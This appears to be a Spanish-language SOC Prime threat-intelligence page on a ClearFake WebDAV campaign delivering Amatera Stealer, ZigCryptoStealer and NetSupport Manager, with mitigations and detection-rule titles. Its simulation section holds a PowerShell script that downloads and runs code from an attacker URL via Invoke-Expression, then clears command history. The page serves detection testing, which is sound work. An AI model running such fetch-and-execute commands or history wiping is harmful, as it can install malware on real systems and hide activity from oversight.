SOC Prime Bias: High

09 Sep 2026 10:12 UTC

La cadena de infección ClearFake WebDAV entrega Amatera Stealer, ZigCryptoStealer y NetSupport Manager

Author Photo
SOC Prime Team linkedin icon Seguir
La cadena de infección ClearFake WebDAV entrega Amatera Stealer, ZigCryptoStealer y NetSupport Manager
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Una campaña impulsada por ClearFake está abusando de WebDAV y Cloudflare Workers para distribuir múltiples cargas de malware. La carga principal, Amatera stealer, está diseñada para exfiltrar credenciales y datos relacionados con criptomonedas. Las cargas adicionales incluyen ZigCryptoStealer entregadas a través de un cargador NativeAOT y instancias no autorizadas de NetSupport Manager utilizadas para establecer acceso remoto.

Investigación

Cisco Talos investigó la ejecución sospechosa de DLL basada en WebDAV en una organización gubernamental de Ucrania. El análisis descubrió dos cadenas de infección separadas: una que utiliza un pf.ch cargador para desplegar ZigCryptoStealer y un proxy inverso basado en Go, y otra que usa un verification.google cargador para instalar NetSupport Manager.

Mitigación

Las organizaciones deben restringir la ejecución de rutas WebDAV y UNC, y monitorear anomalías en rundll32.exe el comportamiento. Se deben utilizar controles EDR robustos para detectar técnicas como el vaciado de DLL y el desplazamiento de módulos. Los equipos de seguridad también deben monitorear el uso no autorizado de NetSupport Manager y la actividad de red relacionada con blockchain sospechosa.

Respuesta

Si se detecta actividad maliciosa, los puntos finales afectados deben ser aislados inmediatamente para prevenir una exfiltración de datos adicional. Los respondedores deben realizar análisis forenses de memoria para identificar malware residente como Amatera. Los equipos de seguridad también deben buscar ejecución de DLL basada en WebDAV y actividad inusual de PowerShell en todo el entorno.

Flujo de Ataque

Todavía estamos actualizando esta parte.

Detecciones

Cadenas de PowerShell sospechosas (a través de PowerShell)

Equipo SOC Prime
08 Sep 2026

LOLBAS Conhost (a través de cmdline)

Equipo SOC Prime
08 Sep 2026

Indicadores de ofuscación de PowerShell posibles (a través de PowerShell)

Equipo SOC Prime
08 Sep 2026

Abuso posible de Telegram como canal de Comando y Control (a través de dns_query)

Equipo SOC Prime
08 Sep 2026

Comando y Control sospechoso por solicitud de DNS de dominio de nivel superior (TLD) inusual (a través de dns)

Equipo SOC Prime
08 Sep 2026

IOCs (SourceIP) para detectar: la cadena de infección ClearFake WebDAV entrega Amatera stealer, ZigCryptoStealer y NetSupport Manager

Reglas AI de SOC Prime
08 Sep 2026

IOCs (DestinationIP) para detectar: la cadena de infección ClearFake WebDAV entrega Amatera stealer, ZigCryptoStealer y NetSupport Manager

Reglas AI de SOC Prime
08 Sep 2026

Comunicación C2 a través de WebSocket seguro con Dubbedmuch para exfiltración de datos [Proxy]

Reglas AI de SOC Prime
08 Sep 2026

Detectar descarga y ejecución de script de PowerShell de NetSupport Manager [Windows PowerShell]

Reglas AI de SOC Prime
08 Sep 2026

Ejecución de DLL WebDAV vía rundll32.exe [Creación de procesos Windows]

Reglas AI de SOC Prime
08 Sep 2026

Ejecución de simulación

Requisito previo: La verificación de Telemetría y Línea base debe haber pasado.

Justificación: Esta sección detalla la ejecución precisa de la técnica adversaria (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTP identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico incorrecto.

  • Narrativa de Ataque y Comandos: El adversario está simulando una cadena de infección «ClearFake». El objetivo es desplegar la herramienta de acceso remoto NetSupport Manager para establecer persistencia y control remoto. Para evitar la detección basada en firmas de descargas de archivos, el atacante utiliza un comando de PowerShell «one-liner» que obtiene una carga útil de JavaScript/PowerShell de un servidor C2 remoto (https://kr.cedar2glanz.ru/jewel.js) y la ejecuta directamente en el búfer de memoria usando Invoke-Expression. Esta técnica deja una huella de disco mínima.

  • Script de Prueba de Regresión:

    # Script de Simulación: Imita la ejecución de carga útil de la cadena de infección ClearFake
    # ADVERTENCIA: Este script utiliza la URL maliciosa específica definida en la regla de detección para activar una alerta.
    
    $maliciousUrl = "https://kr.cedar2glanz.ru/jewel.js"
    Write-Host "[+] Simulando descarga y ejecución maliciosa de PowerShell..." -ForegroundColor Yellow
    
    # Este comando imita el patrón exacto: URL + IEX/Invoke-Expression
    # Usamos un bloque try/catch porque la URL está realmente inaccesible/inactiva, 
    # pero la LÍNEA DE COMANDO DEL PROCESO aún se registrará.
    try {
        Invoke-Expression (New-Object Net.WebClient).DownloadString($maliciousUrl)
    } catch {
        Write-Host "[!] Comando ejecutado (se espera error de red, pero debería generarse telemetría)." -ForegroundColor Cyan
    }
  • Comandos de Limpieza:

    # No se crean archivos por esta prueba específica de ejecución en memoria.
    # Sin embargo, limpiamos el historial de comandos para eliminar rastros de la sesión de usuario local.
    Clear-History
    Write-Host "[+] Limpieza completa. No quedan artefactos en el disco." -ForegroundColor Green